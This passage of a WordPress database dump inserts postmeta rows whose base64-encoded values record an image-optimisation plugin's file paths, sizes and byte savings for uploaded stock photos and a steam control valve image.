INSERT INTO `wp_postmeta` VALUES (28837, 2349, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ3MDAzMzAwMC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NzAwMzMwMDAuanBnIiwid2lkdGgiOjQ3ODMsImhlaWdodCI6MzE4OSwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0ODgzMSwiaWQiOiIyMzQ5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDcwMDMzMDAwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ3MDAzMzAwMC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NzAwMzMwMDAtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjU1NywidGltZSI6MTQ4MzU0ODgzNCwiaWQiOjIzNDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ3MDAzMzAwMC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NzAwMzMwMDAtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDcwMDMzMDAwLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMzQ2LCJ0aW1lIjoxNDgzNTQ4ODM4LCJpZCI6MjM0OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDcwMDMzMDAwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ3MDAzMzAwMC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NzAwMzMwMDAtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjExNjUsInRpbWUiOjE0ODM1NDg4NDEsImlkIjoyMzQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NzAwMzMwMDAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ3MDAzMzAwMC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ3MDAzMzAwMC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo3NTQwLCJ0aW1lIjoxNDgzNTQ4ODQ1LCJpZCI6MjM0OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDcwMDMzMDAwLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ3MDAzMzAwMC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NzAwMzMwMDAtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjQ4MCwidGltZSI6MTQ4MzU0ODg0OCwiaWQiOjIzNDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ3MDAzMzAwMC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NzAwMzMwMDAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDcwMDMzMDAwLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MDMsInRpbWUiOjE0ODM1NDg4NTIsImlkIjoyMzQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NzAwMzMwMDAtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDcwMDMzMDAwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ3MDAzMzAwMC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDQxLCJ0aW1lIjoxNDgzNTQ4ODU1LCJpZCI6MjM0OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDcwMDMzMDAwLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ3MDAzMzAwMC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NzAwMzMwMDAtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEwNDUsInRpbWUiOjE0ODM1NDg4NTksImlkIjoyMzQ5fV0='); 
INSERT INTO `wp_postmeta` VALUES (28838, 2324, 'wpfc_optimisation_reduction', '7784'); 
INSERT INTO `wp_postmeta` VALUES (28839, 2324, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxNzkyNzY0NS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTc5Mjc2NDUuanBnIiwid2lkdGgiOjQwMDAsImhlaWdodCI6MjY2NywibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0ODg2MywiaWQiOiIyMzI0In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE3OTI3NjQ1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxNzkyNzY0NS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTc5Mjc2NDUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjY0MCwidGltZSI6MTQ4MzU0ODg2NywiaWQiOjIzMjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxNzkyNzY0NS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTc5Mjc2NDUtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE3OTI3NjQ1LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMTU2LCJ0aW1lIjoxNDgzNTQ4ODcxLCJpZCI6MjMyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE3OTI3NjQ1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxNzkyNzY0NS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTc5Mjc2NDUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEwODIsInRpbWUiOjE0ODM1NDg4NzUsImlkIjoyMzI0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTc5Mjc2NDUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxNzkyNzY0NS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxNzkyNzY0NS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoyNTIxLCJ0aW1lIjoxNDgzNTQ4ODgwLCJpZCI6MjMyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE3OTI3NjQ1LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxNzkyNzY0NS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTc5Mjc2NDUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU3NiwidGltZSI6MTQ4MzU0ODg4MywiaWQiOjIzMjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxNzkyNzY0NS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTc5Mjc2NDUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE3OTI3NjQ1LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NjYsInRpbWUiOjE0ODM1NDg4ODcsImlkIjoyMzI0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTc5Mjc2NDUtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE3OTI3NjQ1LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxNzkyNzY0NS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTA2LCJ0aW1lIjoxNDgzNTQ4ODkwLCJpZCI6MjMyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE3OTI3NjQ1LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxNzkyNzY0NS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTc5Mjc2NDUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjgzNywidGltZSI6MTQ4MzU0ODg5NCwiaWQiOjIzMjR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28840, 2323, 'wpfc_optimisation_reduction', '106966'); 
INSERT INTO `wp_postmeta` VALUES (28841, 2323, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvU3RlYW0tQ29udHJvbC1WYWx2ZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL1N0ZWFtLUNvbnRyb2wtVmFsdmUuanBnIiwid2lkdGgiOjExMzcsImhlaWdodCI6NDcwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvU3RlYW0tQ29udHJvbC1WYWx2ZS5qcGciLCJyZWR1Y3Rpb24iOjEwNjk1OSwidGltZSI6MTQ4MzU0ODkwMiwiaWQiOiIyMzIzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9TdGVhbS1Db250cm9sLVZhbHZlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvU3RlYW0tQ29udHJvbC1WYWx2ZS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL1N0ZWFtLUNvbnRyb2wtVmFsdmUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg5MDQsImlkIjoyMzIzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL1N0ZWFtLUNvbnRyb2wtVmFsdmUtODAweDMzMS5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjMzMSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9TdGVhbS1Db250cm9sLVZhbHZlLTgwMHgzMzEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvU3RlYW0tQ29udHJvbC1WYWx2ZS04MDB4MzMxLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODkwNiwiaWQiOjIzMjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvU3RlYW0tQ29udHJvbC1WYWx2ZS03Njh4MzE3LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6MzE3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL1N0ZWFtLUNvbnRyb2wtVmFsdmUtNzY4eDMxNy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9TdGVhbS1Db250cm9sLVZhbHZlLTc2OHgzMTcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4OTA5LCJpZCI6MjMyM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9TdGVhbS1Db250cm9sLVZhbHZlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvU3RlYW0tQ29udHJvbC1WYWx2ZS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL1N0ZWFtLUNvbnRyb2wtVmFsdmUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg5MTEsImlkIjoyMzIzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL1N0ZWFtLUNvbnRyb2wtVmFsdmUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9TdGVhbS1Db250cm9sLVZhbHZlLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvU3RlYW0tQ29udHJvbC1WYWx2ZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODkxMywiaWQiOjIzMjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvU3RlYW0tQ29udHJvbC1WYWx2ZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL1N0ZWFtLUNvbnRyb2wtVmFsdmUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9TdGVhbS1Db250cm9sLVZhbHZlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4OTE1LCJpZCI6MjMyM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9TdGVhbS1Db250cm9sLVZhbHZlLTUxMHg0NzAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo0NzAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvU3RlYW0tQ29udHJvbC1WYWx2ZS01MTB4NDcwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL1